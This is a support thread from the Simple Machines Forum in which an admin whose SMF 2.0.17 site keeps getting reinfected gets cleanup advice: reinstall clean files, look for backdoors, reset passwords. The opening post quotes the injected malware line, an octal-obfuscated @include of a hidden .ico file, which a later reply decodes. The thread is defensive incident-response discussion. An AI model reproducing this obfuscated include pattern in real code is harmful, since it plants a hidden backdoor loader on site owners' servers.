I have a second problem. I have been hacked. I am finding new index.php files with code such as:
<?php
/*bea04*/
@include "\057hom\145/ma\162ikp\156d/r\150emu\164hca\163tle\056com\057sed\151na/\160hot\157gal\154ery\057pho\164o00\060108\0670/.\142fdc\145ecb\056ico";
/*bea04*/
This sometimes is the only code in the index.php file or the proper index.php file has this coded added to the top. I've changed database name/password. I have moved the site to another server. Yet this code keeps showing up. No matter what I do. Is it somewhere in the database then?
How can I get rid of it. Maybe my other issue will go away after that. I haven't tried replacing any files that have been modified only editing out the extra incorrect code and then deleting any of those extra index.php files from directories.
Also if a directory had an index.htm(l) file it gets renamed to index.htm(l).bak.bak
Best bet is copy all your files backup the files,
Then do a clean install of SMF.
If you run other scripts such as wordpress that can also be the source of the infection.
Backup your database and files, delete ALL files in forum directory, upload clean set of files, upload Settings.php and Settings_bak.php from backup, reinstall mods and themes. The hack can be in multiple files/directories and reinstalls itself when you clean up index.php.
Besides the files you need to also make sure:
DB has not been compromised with inserted code that can be brought back up.
Strange accounts on DB that may have unauthorized privileges,
Host security. For instance, versions of software, firewall, shared resources, etc.
https://wiki.simplemachines.org/smf/How_to_upload_a_fresh_set_of_files
make sure you reset all your passwords associated with your hosting.
What version of Smf do you have? This looks like a case of server being compromised. Bring your host up to date on this too. ANother thing that I would be looking for are backdoors.
I'm using 2.0.17
I cleaned up the files that were modified. At least that I could tell were modified. And moved it to another host. Fortunately I have more than one available. After moving it that did change the database name/password. FTP information all got changed.
But again I discovered the modified files. So I am really thing something in the database itself has been compromised since I transferred that to the new host as well.
I'm going to try the fresh install and see what happens. Wish I knew what to look for in the database to see if there is any malicious code there hiding.
if you moved the entire contents and only "cleaned" files which you THOUGHT were compromised, then chances are yo actually missed the installed back door.
Usually, once they get in, they will put an actual back door buried 23 directories deep.
That's why you were asked to DELETE EVERYTHING, put back a KNOWN CLEAN copy of SMF than then restore specific files/directories as you confirm that they are not compromised.
Lainaus käyttäjältä: bynw - huhtikuu 23, 2020, 12:11:06 IP
I'm using 2.0.17
I'm going to try the fresh install and see what happens. Wish I knew what to look for in the database to see if there is any malicious code there hiding.
The hidden malicious code a.k.a the backdoor, is going to be in the forum folder and not in the database.
Cleaned up a couple of hacks where all index.php files in all subdirectories were infected, as were multiple source files. You're not going to fix this by nitpicking files. Once the files are clean, then you can worry about the database, but don't think that will be necessary.
I would assume every single PHP file is infected, not just index.php ones.
I've seen some sneaky ones over the years, like embedding themselves on the very first line (the <?php line) with a lot of spaces so that in a normal editor you wouldn't see the code because the spaces pushed it to the right.
If you're not going to start with what the industry calls 'nuke and pave', the very first step must be to contain infection by making all files and folders read-only so nothing can be altered without you doing it.
You should:
1. Backup your database
2. Delete all files and folders in public_html/www folder
3. Upload the clean SMF2.1 RC2 to public_html/www folder
4. Run upgrade.php
Good luck!
Lainaus käyttäjältä: Bobby - huhtikuu 24, 2020, 03:15:10 IP
You should:
1. Backup your database
2. Delete all files and folders in public_html/www folder
3. Upload the clean SMF2.1 RC2 to public_html/www folder
4. Run upgrade.php
Good luck!
no.... this is wrong
first and foremost - he needs to back up the FILES as well, otherwise he'll lose all attachments and avatars.
We've told him.
Backup (database and files)
delete all files and directories other than Settings.php
load clean files from upgrade archive
(no need to run upgrade.php)
Reset all users to the default theme
then restore the contents of avatars and attachments as contents are confirmed to be clean.
re-install custom theme from scratch
re-install mods from scratch
Lainaus käyttäjältä: Kindred - huhtikuu 24, 2020, 03:19:31 IP
Lainaus käyttäjältä: Bobby - huhtikuu 24, 2020, 03:15:10 IP
You should:
1. Backup your database
2. Delete all files and folders in public_html/www folder
3. Upload the clean SMF2.1 RC2 to public_html/www folder
4. Run upgrade.php
Good luck!
no.... this is wrong
first and foremost - he needs to back up the FILES as well, otherwise he'll lose all attachments and avatars.
We've told him.
Backup (database and files)
delete all files and directories other than Settings.php
load clean files from upgrade archive
(no need to run upgrade.php)
Reset all users to the default theme
then restore the contents of avatars and attachments as contents are confirmed to be clean.
re-install custom theme from scratch
re-install mods from scratch
Oh yes, i forgot something, should delete everything in public_html except attachments, avatars folder and the old Settings.php file, then run upgrade.php! That maybe a simple way!
no no no no...
there is no need to run upgrade.php.
The OP is not upgrading anything.
See my steps.
follow my steps.
The code you posted is actually this (I Xed out the initial path):
@include "/XXXX/XXXX/XXXX.com/sedina/photogallery/photo00010870/.bfdceecb.ico";
Did you attempt to install some sort of 3rd party photo gallery?
That looks to me like something masquerading as a legitimate URL to smuggle in something not legitimate. Common tactic.
Lainaus käyttäjältä: Chen Zhen - huhtikuu 24, 2020, 06:48:30 IP
The code you posted is actually this (I Xed out the initial path):
@include "/XXXX/XXXX/XXXX.com/sedina/photogallery/photo00010870/.bfdceecb.ico";
Did you attempt to install some sort of 3rd party photo gallery?
No that was just a folder that was linked to off the forum. Not integrated into it. No PHP files at all. I dont see that .ico file in the backup though.
You seem to be at the point of a fresh SMF upgrade for the moment.
When you reinstall your portal, make sure it is the most recent version and also disable any PHP blocks.
If you have any member that has portal admin access or any kind of admin access, temporarily suspend that access.
Any access to writing PHP blocks will allow someone to do what they want to your forum directory.
Do you have any 3rd party scripts that are not part of SMF?
Like some sort of chat or game that runs off of a child path of your SMF forum?
Lainaus käyttäjältä: Chen Zhen - huhtikuu 24, 2020, 08:49:00 IP
You seem to be at the point of a fresh SMF upgrade for the moment.
When you reinstall your portal, make sure it is the most recent version and also disable any PHP blocks.
If you have any member that has portal admin access or any kind of admin access, temporarily suspend that access.
Any access to writing PHP blocks will allow someone to do what they want to your forum directory.
Do you have any 3rd party scripts that are not part of SMF?
Like some sort of chat or game that runs off of a child path of your SMF forum?
I don't think I had PHP blocks on the portal. And didn't see anything when I just now reinstalled it. I'm not using any of the articles features on the portal. Just some side blocks.
The only mods came from SMF
Thank you for the advice. As now the forums are back up and thankfully there was no code inserted into the database itself. This can happen if the hacker gains access but it looks like they just gained access to the webserver and not the database. And they didn't create a user for themselves on the forum either. Slowly rebuilding the site with the mods.
But I have noticed that the Latest Post hasn't updated in 5 days. In the Forum Stats section at the bottom of the forum home page. Now granted during some of that time the forum was offline. But since it's been back online there have been additional posts made. When clicking on the View the Most Recent Posts on the Forum line in the status section. The new posts show there.
Just go into your forum maintenance and run the "Recount all forum totals and statistics" task.
Since you seem to have fixed your initial problem, I'll mark the topic solved.